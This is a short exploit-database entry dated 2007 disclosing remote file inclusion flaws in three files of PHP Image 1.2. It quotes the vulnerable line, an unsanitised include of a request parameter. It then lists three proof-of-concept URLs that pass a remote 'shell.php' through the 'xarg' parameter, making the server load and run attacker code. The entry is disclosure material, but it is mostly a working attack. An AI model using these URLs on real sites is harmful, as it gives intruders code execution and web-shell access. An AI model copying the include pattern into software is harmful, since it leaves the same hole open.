id: 2246
date: 10/22/2007
title: PHP Image 1.2 Multiple Remote File Inclusion Vulnerabilities
author: Civi
cves: 

============================================================
PHP Image 1.2 Multiple Remote File Inclusion Vulnerabilities
============================================================



PHP Image v1.2 Multiple Remote File Inclusion

Download: http://www.phpimage.co.uk/phpimage_v_1_2.zip

Bug found by Civi

Vuln code in xarg_corner.php, xarg_corner_bottom.php, xarg_corner_top.php:

<td style="background-image: url(images/cor_top_fill.jpg);"><?php include($xarg); ?></td>

POC:

http://site/xarg_corner.php?xarg=http://shell.php?
http://site/xarg_corner_bottom.php?xarg=http://shell.php ?
http://site/xarg_corner_top.php?xarg=http://shell.php?



#  0day.today [2023-03-22]  #